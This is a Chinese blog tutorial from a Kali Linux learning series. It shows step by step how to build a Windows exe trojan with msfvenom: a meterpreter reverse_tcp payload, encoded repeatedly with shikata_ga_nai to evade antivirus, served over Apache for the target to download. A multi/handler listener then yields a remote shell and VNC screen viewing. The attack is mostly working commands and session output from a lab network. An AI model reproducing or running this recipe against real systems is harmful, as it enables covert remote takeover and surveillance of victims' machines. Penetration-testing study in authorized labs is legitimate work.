kali学习4——使用msfvenom制作exe木马

最新推荐文章于 2024-05-17 17:33:46 发布

loca.

最新推荐文章于 2024-05-17 17:33:46 发布

阅读量5.5k

点赞数 7

分类专栏： Kali学习文章标签： kali linux 网络安全渗透测试

本文链接：https://blog.csdn.net/haixing1994/article/details/113394908

版权

Kali学习专栏收录该内容

4 篇文章 4 订阅

订阅专栏

使用msfvenom制作exe木马文件

1. msfvenom

msfvenom是msfpayload,msfencode的结合体。使用msfvenom制作木马的思路是，木马在目标机上执行后，向本机发送信息，而本机则需要开启监听状态，收到信息后则进行连接。

2. 制作木马

msfvenom制作木马需要的参数很多：

root@kali:~# msfvenom -h
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>
Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe

Options:
    -l, --list            <type>     List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all
    -p, --payload         <payload>  Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
        --list-options               List --payload <value>'s standard, advanced and evasion options
    -f, --format          <format>   Output format (use --list formats to list)
    -e, --encoder         <encoder>  The encoder to use (use --list encoders to list)
        --service-name    <value>    The service name to use when generating a service binary
        --sec-name        <value>    The new section name to use when generating large Windows binaries. Default: random 4-character alpha string
        --smallest                   Generate the smallest possible payload using all available encoders
        --encrypt         <value>    The type of encryption or encoding to apply to the shellcode (use --list encrypt to list)
        --encrypt-key     <value>    A key to be used for --encrypt
        --encrypt-iv      <value>    An initialization vector for --encrypt
    -a, --arch            <arch>     The architecture to use for --payload and --encoders (use --list archs to list)
        --platform        <platform> The platform for --payload (use --list platforms to list)
    -o, --out             <path>     Save the payload to a file
    -b, --bad-chars       <list>     Characters to avoid example: '\x00\xff'
    -n, --nopsled         <length>   Prepend a nopsled of [length] size on to the payload
        --pad-nops                   Use nopsled size specified by -n <length> as the total payload size, auto-prepending a nopsled of quantity (nongth)
    -s, --space           <length>   The maximum size of the resulting payload
        --encoder-space   <length>   The maximum size of the encoded payload (defaults to the -s value)
    -i, --iterations      <count>    The number of times to encode the payload
    -c, --add-code        <path>     Specify an additional win32 shellcode file to include
    -x, --template        <path>     Specify a custom executable file to use as a template
    -k, --keep                       Preserve the --template behaviour and inject the payload as a new thread
    -v, --var-name        <value>    Specify a custom variable name to use for certain output formats
    -t, --timeout         <second>   The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)
    -h, --help                       Show this message

主要使用的参数有：

-p 设置payload，查看可以使用的payload可以使用命令(msfvenom -l payload)

-e 对生成的木马使用编码器，编码器可以在一定程度上绕过杀毒软件。查看可用编码器(msfvenom -l encoder)

-i 编码次数

-f 输出木马的格式(i.e. exe)

LHOST 本机IP

LPORT 本机端口

使用命令行生成木马文件，并存储在/var/www/html文件夹中，这样目标机可以直接网页下载：

root@kali:~# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.197.53 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/abc.exe
Found 1 compatible encoders
Attempting to encode payload with 10 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 381 (iteration=0)
x86/shikata_ga_nai succeeded with size 408 (iteration=1)
x86/shikata_ga_nai succeeded with size 435 (iteration=2)
x86/shikata_ga_nai succeeded with size 462 (iteration=3)
x86/shikata_ga_nai succeeded with size 489 (iteration=4)
x86/shikata_ga_nai succeeded with size 516 (iteration=5)
x86/shikata_ga_nai succeeded with size 543 (iteration=6)
x86/shikata_ga_nai succeeded with size 570 (iteration=7)
x86/shikata_ga_nai succeeded with size 597 (iteration=8)
x86/shikata_ga_nai succeeded with size 624 (iteration=9)
x86/shikata_ga_nai chosen with final size 624
Payload size: 624 bytes
Final size of exe file: 73802 bytes
Saved as: /var/www/html/abc.exe

其中参数的含义分别为：

-a x86 									使用x86框架，因为windows系统中32位程序可以运行在64位系统下，所以不必使用x64
--platform windows 						运行平台为windows
-p windows/meterpreter/reverse_tcp		指定payload
LHOST=192.168.197.53 LPORT=4444			本机的IP和端口
-b "\x00"								去掉坏字符
-e x86/shikata_ga_nai					指定编码格式
-i 10 									编码10次（可提升免杀概率）
-f exe 									生成exe木马文件格式
-o /var/www/html/abc.exe				输出路径

然后开启apache服务

systemctl start apache2

开启apache服务后，在目标机浏览器中输入"192.168.197.53/abc.exe"可以开始下载文件

3. 木马运行获得目标机shell

在kali中需要在msfconsole设置一些参数，然后开启监听，这样木马运行后便能够获得shell：

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.197.53
LHOST => 192.168.197.53
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.197.53:4444 
[*] Sending stage (175174 bytes) to 192.168.197.54
[*] Meterpreter session 1 opened (192.168.197.53:4444 -> 192.168.197.54:49238) at 2021-01-29 16:19:35 +0800

meterpreter >

进入meterpreter后便已经获得了目标机shell，输入help查看更多命令。

输入run vnc命令可以实时查看目标机的屏幕。

loca.

关注

7
点赞
踩
29

收藏

觉得还不错? 一键收藏
2
评论
kali学习4——使用msfvenom制作exe木马

使用msfvenom制作exe木马文件1. msfvenommsfvenom是msfpayload,msfencode的结合体。使用msfvenom制作木马的思路是，木马在目标机上执行后，向本机发送信息，而本机则需要开启监听状态，收到信息后则进行连接。2. 制作木马msfvenom制作木马需要的参数很多：root@kali:~# msfvenom -hMsfVenom - a Metasploit standalone payload generator.Also a replacement
复制链接

扫一扫